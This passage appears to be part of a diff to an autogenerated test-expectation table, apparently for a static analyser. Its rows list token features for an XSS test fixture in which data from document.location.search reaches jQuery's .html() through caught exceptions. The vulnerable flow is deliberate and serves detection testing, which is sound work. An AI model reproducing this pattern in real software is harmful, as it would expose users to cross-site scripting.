autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:13 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:13 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:20 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | 'arguments' object of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | exceptional return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | resolve ... esolve) | CalleeFlexibleAccessPath | Promise | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | resolve ... esolve) | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | resolve ... esolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | resolve ... esolve) | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | resolve ... esolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | resolve ... esolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | resolve ... esolve) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:45 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:31 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:31 | unknown | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:31 | unknown | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:31 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:31 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | exceptional return of unknown ... esolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | exceptional return of unknown ... esolve) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | exceptional return of unknown ... esolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | exceptional return of unknown ... esolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | exceptional return of unknown ... esolve) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | unknown ... esolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | unknown ... esolve) | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | unknown ... esolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | unknown ... esolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:25:148:45 | unknown ... esolve) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:33:148:35 | foo | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:33:148:35 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:33:148:35 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19254,6 +130235,16 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:148:38:148:44 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:38:148:44 | resolve | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:38:148:44 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:48:148:52 | catch | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:48:148:52 | catch | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:48:148:52 | catch | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:48:148:52 | catch | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:48:148:52 | catch | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | 'arguments' object of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | 'arguments' object of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | (e) => ... T OK\\n\\t} | CalleeFlexibleAccessPath | Promise().catch | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | (e) => ... T OK\\n\\t} | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | (e) => ... T OK\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19261,6 +130252,56 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | (e) => ... T OK\\n\\t} | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | (e) => ... T OK\\n\\t} | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | (e) => ... T OK\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | exceptional return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:54:150:2 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:55:148:55 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:3 | $ | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:3 | $ | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | $('myId') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:16 | $('myId').html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:16 | $('myId').html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | $('myId').html(e) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:3:149:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:5:149:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:5:149:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:5:149:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19268,6 +130309,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:149:5:149:10 | 'myId' | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:5:149:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:5:149:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:13:149:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:13:149:16 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:13:149:16 | html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:13:149:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:149:13:149:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:18:149:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:18:149:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:18:149:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19275,6 +130321,61 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:149:18:149:18 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:18:149:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:149:18:149:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:6 | null | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:6 | null | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:6 | null | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:6 | null | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:6 | null | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:11 | null[foo] | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:11 | null[foo] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:11 | null[foo] | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:11 | null[foo] | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:3:153:11 | null[foo] | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:8:153:10 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:8:153:10 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:8:153:10 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:8:153:10 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:153:8:153:10 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:154:11:154:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:3 | $ | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | $('myId') | enclosingFunctionName | | +| 